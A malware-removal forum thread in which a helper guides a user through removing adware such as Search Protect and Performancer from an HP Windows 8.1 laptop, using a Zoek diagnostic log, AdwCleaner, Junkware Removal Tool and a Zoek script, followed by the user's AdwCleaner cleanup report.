C:\Users\paulj_000\AppData\Roaming\Search Protection\SearchProtection.exe
C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe
C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe
C:\ProgramData\Internet Helper Anti-phishing\internetHelper_antiphishing.exe
C:\Program Files\AVAST Software\Avast\avastui.exe
C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
C:\Windows\SysWOW64\rundll32.exe
C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe
C:\Users\paulj_000\Downloads\zoek.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe

==== Services (whitelist) ======================
Powered by E Dev

R2 - [AERTFilters] - Andrea RT Filters Service - C:\Program Files\Realtek\Audio\HDA\AERTSr64.EXE
R2 - [AtherosSvc] - AtherosSvc - "C:\Program Files (x86)\Bluetooth Suite\adminservice.exe"
R2 - [BackupStack] - Computer Backup (MyPC Backup) - C:\Program Files (x86)\MyPC Backup\BackupStack.exe
R2 - [Bonjour Service] - Bonjour Service - "C:\Program Files\Bonjour\mDNSResponder.exe"
R2 - [Cachedrv server] -  HP SimplePass Cachedrv Service - "C:\Program Files\Hewlett-Packard\SimplePass\cachesrvr.exe"
R2 - [CltMngSvc] - Search Protect Service - C:\PROGRA~2\SearchProtect\Main\bin\CltMngSvc.exe
R2 - [dfc86759] - Performancer - "C:\Windows\system32\rundll32.exe" "c:\progra~3\perfor~1\PerformancerSvc.dll",service
R2 - [HP Support Assistant Service] - HP Support Assistant Service - "C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe"
R2 - [Intel® Capability Licensing Service Interface] - Intel® Capability Licensing Service Interface - "C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe"
R2 - [omniserv] -  HP SimplePass Service - C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe
R2 - [ReimageRealTimeProtection] - Reimage Real Time Protection - C:\Program Files\Reimage\Reimage Repair\ReiGuard.exe
R2 - [RtkAudioService] - Realtek Audio Service - C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
R2 - [WSearch] - Windows Search - C:\Windows\system32\SearchIndexer.exe /Embedding
R3 - [VSS] - Volume Shadow Copy - C:\Windows\system32\vssvc.exe
S2 - [gupdate] - Google Update Service (gupdate) - "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
S2 - [sppsvc] - Software Protection - C:\Windows\system32\sppsvc.exe
S3 - [AdobeFlashPlayerUpdateSvc] - Adobe Flash Player Update Service - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
S3 - [ALG] - Application Layer Gateway Service - C:\Windows\System32\alg.exe
S3 - [aspnet_state] - ASP.NET State Service - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
S3 - [COMSysApp] - COM+ System Application - C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
S3 - [cphs] - Intel® Content Protection HECI Service - C:\Windows\SysWow64\IntelCpHeciSvc.exe
S3 - [Fax] - Fax - C:\Windows\system32\fxssvc.exe
S3 - [FontCache3.0.0.0] - Windows Presentation Foundation Font Cache 3.0.0.0 - C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
S3 - [GamesAppService] - GamesAppService - "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe"
S3 - [gupdatem] - Google Update Service (gupdatem) - "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc
S3 - [gusvc] - Google Software Updater - "C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe"
S3 - [hpqwmiex] - HP Software Framework Service - "C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe"
S3 - [ICCS] - Intel® Integrated Clock Controller Service - Intel® ICCS - "C:\Program Files (x86)\Intel\Intel® Integrated Clock Controller Service\ICCProxy.exe"
S3 - [IEEtwCollectorService] - Internet Explorer ETW Collector Service - C:\Windows\system32\IEEtwCollector.exe /V
S3 - [Intel® Capability Licensing Service TCP IP Interface] - Intel® Capability Licensing Service TCP IP Interface - "C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe"
S3 - [MozillaMaintenance] - Mozilla Maintenance Service - "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
S3 - [MSDTC] - Distributed Transaction Coordinator - C:\Windows\System32\msdtc.exe
S3 - [msiserver] - Windows Installer - C:\Windows\system32\msiexec.exe /V
S3 - [PerfHost] - Performance Counter DLL Host - C:\Windows\SysWow64\perfhost.exe
S3 - [RpcLocator] - Remote Procedure Call (RPC) Locator - C:\Windows\system32\locator.exe
S3 - [SNMPTRAP] - SNMP Trap - C:\Windows\System32\snmptrap.exe
S3 - [TrustedInstaller] - Windows Modules Installer - C:\Windows\servicing\TrustedInstaller.exe
S3 - [vds] - Virtual Disk - C:\Windows\System32\vds.exe
S3 - [wbengine] - Block Level Backup Engine Service - "C:\Windows\system32\wbengine.exe"
S3 - [WdNisSvc] - Windows Defender Network Inspection Service - "C:\Program Files\Windows Defender\NisSrv.exe"
S3 - [WinDefend] - Windows Defender Service - "C:\Program Files\Windows Defender\MsMpEng.exe"
S3 - [wmiApSrv] - WMI Performance Adapter - C:\Windows\system32\wbem\WmiApSrv.exe
S3 - [WMPNetworkSvc] - Windows Media Player Network Sharing Service - "C:\Program Files\Windows Media Player\wmpnetwk.exe"

==== System Specs ======================

Windows: Windows Version 6.2 (Build 9200)
Memory (RAM): 3993 MB
CPU Info: Intel® Celeron® CPU  N2810  @ 2.00GHz
CPU Speed: 2010.8 MHz
Sound Card: Speaker/HP (Realtek High Defini |
Display Adapters: Intel® HD Graphics | Intel® HD Graphics
Monitors: 1x; Generic PnP Monitor |
Screen Resolution: 1366 X 768 - 32 bit
Network: Network Present
Network Adapters: Microsoft Wi-Fi Direct Virtual Adapter | Qualcomm Atheros QCA9565 802.11b/g/n WiFi Adapter | Realtek PCIe FE Family Controller
CD / DVD Drives: 1x (E: | ) E: hp      CDDVDW SU-208FB
Ports: COM Ports NOT Present. LPT Port NOT Present.
Mouse: 5 Button Wheel Mouse Present
Hard Disks: C:  914.8GB | D:  15.9GB
Hard Disks - Free: C:  846.9GB | D:  1.6GB
Manufacturer *: Hewlett-Packard
BIOS Info: AT/AT COMPATIBLE |  | HPQOEM - 3
Time Zone: GMT Standard Time
Motherboard *: Hewlett-Packard 2190
Country: United Kingdom
Language: ENG

==== System Specs (Software) ======================

Anti-Virus: Windows Defender On-access scanning disabled (Outdated)
Anti-Virus: avast! Antivirus On-access scanning disabled (Outdated)
Anti-Spyware: Windows Defender disabled (Outdated)
Anti-Spyware: avast! Antivirus disabled (Outdated)
Internet Explorer Version: 11.0.9600.17107
Mozilla Firefox version: 29.0.1 (x86 en-GB)
Google Chrome version: 35.0.1916.114
Flash Player version: 13.0.0.214
Shockwave Player version: 12.0.4r144

==== Startup Registry Enabled ======================

[HKEY_USERS\S-1-5-21-3242301468-3912853311-3031073808-1003\Software\Microsoft\Windows\CurrentVersion\Run]
"uTorrent"="C:\Users\paulj_000\AppData\Roaming\uTorrent\uTorrent.exe  /MINIMIZED"
"SearchProtection"="C:\Users\paulj_000\AppData\Roaming\Search Protection\SearchProtection.EXE /autostart"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"YouCam Service"="C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe /s"
"HPMessageService"="C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe"
"Internet Helper Anti-phishing"="C:\ProgramData\Internet Helper Anti-phishing\internetHelper_antiphishing.exe"
"AvastUI.exe"="C:\Program Files\AVAST Software\Avast\AvastUI.exe /nogui"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"uTorrent"="C:\Users\paulj_000\AppData\Roaming\uTorrent\uTorrent.exe  /MINIMIZED"
"SearchProtection"="C:\Users\paulj_000\AppData\Roaming\Search Protection\SearchProtection.EXE /autostart"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="c:\\progra~2\\searchprotect\\searchprotect\\bin\\spvc32loader.dll c:\\progra~3\\perfor~1\\perfor~1.dll"

==== Startup Registry Enabled x64 ======================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="C:\Windows\system32\igfxtray.exe"
"HotKeysCmds"="C:\Windows\system32\hkcmd.exe"
"Persistence"="C:\Windows\system32\igfxpers.exe"
"RTHDVCPL"="C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe -s"
"SimplePass"="C:\Program Files\Hewlett-Packard\SimplePass\HPSmplPass.exe /hideui"
"OPBHOBroker"="C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe"
"OPBHOBrokerDesktop"="C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe"
"Classic Start Menu"="C:\Program Files\Classic Shell\ClassicStartMenu.exe -autorun"
"SynTPEnh"="%ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe "

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="C:\\PROGRA~2\\SearchProtect\\SearchProtect\\bin\\SPVC64Loader.dll C:\\PROGRA~3\\PERFOR~1\\PERFOR~2.DLL"

==== Startup Folders ======================

2014-05-04 15:45:17    1120    ----a-w-    C:\Users\Sarah\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPC Backup.lnk

==== Task Scheduler Jobs ======================

C:\Windows\tasks\Adobe Flash Player Updater.job --a-------- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [13/05/2014 21:23]
C:\Windows\tasks\GoogleUpdateTaskMachineCore.job --a-------- C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [04/05/2014 16:56]
C:\Windows\tasks\GoogleUpdateTaskMachineUA.job --a-------- C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [04/05/2014 16:56]
C:\Windows\tasks\HPCeeScheduleForpaulj_000.job --a-------- C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [15/07/2011 04:43]
C:\Windows\tasks\HPCeeScheduleForSarah.job --a-------- C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [15/07/2011 04:43]

==== Other Scheduled Tasks ======================

"C:\Windows\SysNative\tasks\Adobe Flash Player Updater" [C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe]
"C:\Windows\SysNative\tasks\CLMLSvc_P2G8" [C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe]
"C:\Windows\SysNative\tasks\CLVDLauncher" [C:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe]
"C:\Windows\SysNative\tasks\GoogleUpdateTaskMachineCore" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]
"C:\Windows\SysNative\tasks\GoogleUpdateTaskMachineUA" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]
"C:\Windows\SysNative\tasks\HPCeeScheduleForpaulj_000" [C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe]
"C:\Windows\SysNative\tasks\HPCeeScheduleForSarah" [C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe]
"C:\Windows\SysNative\tasks\Reimage Reminder" ["C:\Program Files\Reimage\Reimage Repair\ReimageReminder.exe"]
"C:\Windows\SysNative\tasks\Synaptics TouchPad Enhancements" ["C:\Program Files\Synaptics\SynTP\SynTPEnh.exe"]
"C:\Windows\SysNative\tasks\User_Feed_Synchronization-{02818842-BFB5-4559-BA7D-2FE689C8B86C}" [C:\Windows\system32\msfeedssync.exe]
"C:\Windows\SysNative\tasks\User_Feed_Synchronization-{F986E634-3E42-4B80-80BA-BBC8DF9E2D1E}" [C:\Windows\system32\msfeedssync.exe]
"C:\Windows\SysNative\tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start" [C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe]
"C:\Windows\SysNative\tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis" [C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe]
"C:\Windows\SysNative\tasks\Hewlett-Packard\HP Support Assistant\Update Check" [C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe]
"C:\Windows\SysNative\tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker" [C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe]
"C:\Windows\SysNative\tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan" [C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe]

==== Firefox Extensions Registry ======================

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Mozilla\Firefox\Extensions]
"[email protected]"="C:\Program Files\AVAST Software\Avast\WebRep\FF" [04/05/2014 16:54]

==== Firefox Extensions ======================

ProfilePath: C:\Users\PAULJ_~1\AppData\Roaming\Mozilla\Firefox\Profiles\f7t4qr94.default
- Undetermined - %ProfilePath%\extensions\staged
- ddeaalPeaK - %ProfilePath%\extensions\[email protected]

ProfilePath: C:\Users\Sarah\AppData\Roaming\Mozilla\Firefox\Profiles\bsba1crn.default
- Undetermined - %ProfilePath%\extensions\staged
- ddeaalPeaK - %ProfilePath%\extensions\[email protected]

AppDir: C:\Program Files (x86)\Mozilla Firefox
- Default - %AppDir%\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

==== Firefox Plugins ======================

Profilepath: C:\Users\paulj_000\AppData\Roaming\Mozilla\Firefox\Profiles\f7t4qr94.default
A58DE0A570148AF5FF3512B2A340D09F    - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_214.dll -    Shockwave Flash
0C0C5C207121C7A78414A8250E8E099A    - C:\windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll -    Shockwave for Director / Shockwave for Director


==== Chrome Look ======================

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions
gomekmidlodglbbmalcneegieacbdmki - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx[04/05/2014 16:53]

Google Drive - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf
YouTube - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo
Google Search - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf
safeRwwebb - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\effalkbfcccbfoockmapkhkmkijlfmbh
Strong Password Generator - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\emehklffcaphknhhfhadkjhpfapcbpco
avast Online Security - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki
Google Wallet - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
Gmail - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia
Google Docs - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake
Google Drive - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf
YouTube - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo
Google Search - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf
safeRwwebb - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\effalkbfcccbfoockmapkhkmkijlfmbh
Strong Password Generator - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\emehklffcaphknhhfhadkjhpfapcbpco
avast Online Security - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki
ddeaalPeaK - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpmobbbkiifncejmggdjbhcapfmacgeb
Google Wallet - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
Gmail - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia

==== C:\zoek_backup content ======================

C:\zoek_backup (files=0 folders=0 0 bytes)

==== EOF on 05/06/2014 at 17:21:11.60 ======================
 


  • 0

#4
Naathim

Naathim

    GeekU Minion

  • Expert
  • 4,568 posts
Hi :)

Let's start the fight!


I've spotted signs of a P2P program installed on your machine.
uTorrent
 

icon_exclaim.gifBe warned:

P2P programs, as they are legal itself, are often used to obtain some illegal downloads. Currently it's one of the best ways to get infected: unsecured ports, downloaded cracks... There have been some extreme cases in which passwords, private or financial data was exposed to file sharing network because of bad P2P configuration.

I'm rather sure that if you'll continue using P2P, you'll be often visiting our Malware Removal Forum.
I strongly recommend full uninstallation of any P2P apps (if so, please do it from the Control Panel > Add/Remove Programs), but if you want to leave them on your OS (cause this is optional), at least please refrain from using it until we finish our work with cleaning your computer now.
 

My friendly advice: at least, when downloading any files from P2P network, scan them at Jotti or VirScan.




We need to uninstall some software from your machine.

Please open Start > Control Panel > Uninstall a program or Programs and Features if in Classic View, locate these programs on the list and uninstall them one after another:
  • uTorrent (optional)
  • Internet Helper Anti-phishing
  • MyPC Backup
  • Optimizer Pro v3.2
  • Performancer
  • Reimage Repair
  • SoftwareWatcher bundle
  • toopbUyEr
All of these are unwanted, so don't hesitate to get rid of them!
If you won't find some of them in the Control Panel, just move on and notify me :)



= = = = = = = = = = = = = = = = = = = =



icon_arrow.gifFIRST

Download ADWCleaner by Xplode to your desktop.
  • Close all programs and right-click on the adwcleaner.png icon - select Run as Administrator.
    (Users of Windows XP please just double-click).
  • You will be presented with the console like the one below:

    adwcleaner-start.jpg

  • Click on Scan and follow the prompts.
  • Let it run unhindered.
  • When done, click on the Clean button, and follow the prompts.
  • Allow the system to reboot.
After that, you will then be presented with the report. Copy & Paste this report on your next reply.

icon_idea.gif The report will be saved in the C:\AdwCleaner folder, as AdwCleaner[S0].txt.

 

= = = = = = = = = = = = = = = = = = = =



icon_arrow.gifSECOND

Please download Junkware Removal Tool by Thisisu to your desktop.
Shut down your protection software now to avoid potential conflicts! If you don't know how to do it, take a look at this topic.
  • Run the tool by double-clicking the junkware_removal_tool.png icon.
    If you are using Windows Vista, 7 or 8 instead of double-clicking, right-click and select Run as Administrator.
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.

= = = = = = = = = = = = = = = = = = = =



icon_arrow.gifTHIRD

I need you to download the attached script:
Attached File  zoekscript.txt   2.37KB   111 downloads

icon_idea.gif Disable your AntiVirus and AntiSpyware programs, so they do not interfere with the running of Zoek.exe. You can find instructions how to disable your security applications here.

Now, on your Desktop, drag and drop zoekscript.txt on Zoek.exe as shown below:


51dd31d8563a6-output_TD9fmK.gif


Please approve any UAC prompt to allow this action to proceed.

Answer Yes to the following prompt to allow the zoek script to run:


zoek-script-warning.jpg


This action causes Zoek.exe to start automatically. Please be patient while Zoek is scanning.

When the tool finishes, the zoek-results.log is opened in Notepad.
The log is also found on the systemdrive, normally C:\
If a reboot is needed, the log is opened after the reboot.

Please post the zoek-results.log in your reply.




= = = = = = = = = = = = = = = = = = = =



Now in your next post please include these ones for me:
icon_arrow.gif AdwCleaner report
icon_arrow.gif JRT report
icon_arrow.gif ZOEK report

I don't mind multiple posts if necessary.

Cheers,
Naat :)
  • 0

#5
peejaygee

peejaygee

    Member

  • Topic Starter
  • Member
  • PipPip
  • 39 posts

I was unable to uninstall Optimizer Pro v3.2.

 

 

# AdwCleaner v3.212 - Report created 09/06/2014 at 18:32:37
# Updated 05/06/2014 by Xplode
# Operating System : Windows 8.1  (64 bits)
# Username : paulj_000 - PC
# Running from : C:\Users\paulj_000\Downloads\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

Service Deleted : CltMngSvc

***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\374311380
Folder Deleted : C:\ProgramData\safeRwwebb
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\fst
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Uniblue
[!] Folder Deleted : C:\Program Files (x86)\globalUpdate
Folder Deleted : C:\Program Files (x86)\NewPlayer
Folder Deleted : C:\Program Files (x86)\SearchProtect
Folder Deleted : C:\Program Files (x86)\Uniblue
Folder Deleted : C:\Program Files (x86)\fst_gb_31
Folder Deleted : C:\Users\paulj_000\AppData\Local\SearchProtect
Folder Deleted : C:\Users\paulj_000\AppData\Local\fst_gb_31
Folder Deleted : C:\Users\paulj_000\AppData\Roaming\Search Protection
Folder Deleted : C:\Users\Sarah\AppData\Local\globalUpdate
Folder Deleted : C:\Users\Sarah\AppData\Local\SearchProtect
Folder Deleted : C:\Users\Sarah\AppData\Local\fst_gb_31
Folder Deleted : C:\Users\Sarah\AppData\LocalLow\SimplyTech
Folder Deleted : C:\Users\Sarah\AppData\Roaming\Activeris
Folder Deleted : C:\Users\Sarah\AppData\Roaming\Search Protection
Folder Deleted : C:\Users\Sarah\AppData\Roaming\Uniblue
Folder Deleted : C:\Users\Sarah\AppData\Roaming\VOPackage
Folder Deleted : C:\Users\Sarah\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MyPC Backup
Folder Deleted : C:\Users\Sarah\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VOPackage
Folder Deleted : C:\Users\Sarah\Documents\Optimizer Pro
Folder Deleted : C:\Users\paulj_000\AppData\Roaming\Mozilla\Firefox\Profiles\f7t4qr94.default\Extensions\[email protected]
Folder Deleted : C:\Users\Sarah\AppData\Roaming\Mozilla\Firefox\Profiles\bsba1crn.default\Extensions\[email protected]
Folder Deleted : C:\Users\paulj_000\AppData\Roaming\Mozilla\Firefox\Profiles\f7t4qr94.default\Extensions\[email protected]
Folder Deleted : C:\Users\Sarah\AppData\Roaming\Mozilla\Firefox\Profiles\bsba1crn.default\Extensions\[email protected]
Folder Deleted : C:\Users\paulj_000\AppData\Roaming\Mozilla\Firefox\Profiles\f7t4qr94.default\Extensions\[email protected]c58b7567b.com
Folder Deleted : C:\Users\Sarah\AppData\Roaming\Mozilla\Firefox\Profiles\bsba1crn.default\Extensions\[email protected]c58b7567b.com
Folder Deleted : C:\Users\Sarah\AppData\Roaming\Mozilla\Firefox\Profiles\bsba1crn.default\Extensions\[email protected]9c1ae6f92.com
Folder Deleted : C:\Users\paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\effalkbfcccbfoockmapkhkmkijlfmbh
Folder Deleted : C:\Users\Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpmobbbkiifncejmggdjbhcapfmacgeb
File Deleted : C:\END
File Deleted : C:\Users\Public\Desktop\speedupmypc.lnk
File Deleted : C:\Users\Sarah\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPC Backup.lnk
File Deleted : C:\Users\Sarah\Desktop\Continue VuuPC Installation.lnk
File Deleted : C:\Users\Sarah\Desktop\MyPC Backup.lnk
File Deleted : C:\Users\Sarah\Desktop\Sync Folder.lnk
File Deleted : C:\Users\Sarah\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.superfish.com_0.localstorage
File Deleted : C:\Users\Sarah\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.superfish.com_0.localstorage-journal
File Deleted : C:\Users\Sarah\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_inst.shoppingate.info_0.localstorage
File Deleted : C:\Users\Sarah\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_inst.shoppingate.info_0.localstorage-journal
File Deleted : C:\Windows\Tasks\globalUpdateUpdateTaskMachineCore.job
File Deleted : C:\Windows\System32\Tasks\globalUpdateUpdateTaskMachineCore
File Deleted : C:\Windows\Tasks\globalUpdateUpdateTaskMachineUA.job
File Deleted : C:\Windows\System32\Tasks\globalUpdateUpdateTaskMachineUA
File Deleted : C:\Windows\Tasks\SpeedUpMyPC Maintenance.job
File Deleted : C:\Windows\System32\Tasks\SpeedUpMyPC Maintenance
File Deleted : C:\Windows\Tasks\SpeedUpMyPC Startup.job
File Deleted : C:\Windows\System32\Tasks\SpeedUpMyPC Startup
File Deleted : C:\Windows\Tasks\ada83cfd-5ef3-4064-a75e-640321c9eafb-3.job
File Deleted : C:\Windows\System32\Tasks\ada83cfd-5ef3-4064-a75e-640321c9eafb-3
File Deleted : C:\Windows\Tasks\ada83cfd-5ef3-4064-a75e-640321c9eafb-4.job
File Deleted : C:\Windows\System32\Tasks\ada83cfd-5ef3-4064-a75e-640321c9eafb-4
File Deleted : C:\Windows\Tasks\ada83cfd-5ef3-4064-a75e-640321c9eafb-6.job
File Deleted : C:\Windows\System32\Tasks\ada83cfd-5ef3-4064-a75e-640321c9eafb-6
File Deleted : C:\Windows\Tasks\ada83cfd-5ef3-4064-a75e-640321c9eafb-7.job
File Deleted : C:\Windows\System32\Tasks\ada83cfd-5ef3-4064-a75e-640321c9eafb-7
File Deleted : C:\Windows\Tasks\d71a77cf-58c7-4391-af6b-052d6a49ce04-3.job
File Deleted : C:\Windows\System32\Tasks\d71a77cf-58c7-4391-af6b-052d6a49ce04-3
File Deleted : C:\Windows\Tasks\d71a77cf-58c7-4391-af6b-052d6a49ce04-4.job
File Deleted : C:\Windows\System32\Tasks\d71a77cf-58c7-4391-af6b-052d6a49ce04-4
File Deleted : C:\Windows\Tasks\d71a77cf-58c7-4391-af6b-052d6a49ce04-6.job
File Deleted : C:\Windows\System32\Tasks\d71a77cf-58c7-4391-af6b-052d6a49ce04-6
File Deleted : C:\Windows\Tasks\d71a77cf-58c7-4391-af6b-052d6a49ce04-7.job
File Deleted : C:\Windows\System32\Tasks\d71a77cf-58c7-4391-af6b-052d6a49ce04-7

***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Key Deleted : HKLM\SOFTWARE\Classes\speedupmypc
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\speedupmypc_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\speedupmypc_RASMANCS
Key Deleted : HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10
Key Deleted : HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4
Key Deleted : HKLM\SOFTWARE\Classes\safeRweb.safeRweb
Key Deleted : HKLM\SOFTWARE\Classes\safeRweb.safeRweb.1.8
Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [fst_gb_31]
Key Deleted : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{2A77DC0F-47C5-4341-6EAA-586700BAD171}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2A77DC0F-47C5-4341-6EAA-586700BAD171}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2A77DC0F-47C5-4341-6EAA-586700BAD171}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{2A77DC0F-47C5-4341-6EAA-586700BAD171}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{2A77DC0F-47C5-4341-6EAA-586700BAD171}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{2A77DC0F-47C5-4341-6EAA-586700BAD171}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2A77DC0F-47C5-4341-6EAA-586700BAD171}
Key Deleted : HKCU\Software\Tutorials
Key Deleted : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKCU\Software\AppDataLow\Software\Search Protection
Key Deleted : HKLM\Software\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\Software\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\Software\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Deleted : HKLM\Software\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Key Deleted : HKLM\Software\{77D46E27-0E41-4478-87A6-AABE6FBCF252}
Key Deleted : HKLM\Software\SearchProtect
Key Deleted : HKLM\Software\SweetIM
Key Deleted : HKLM\Software\Tutorials
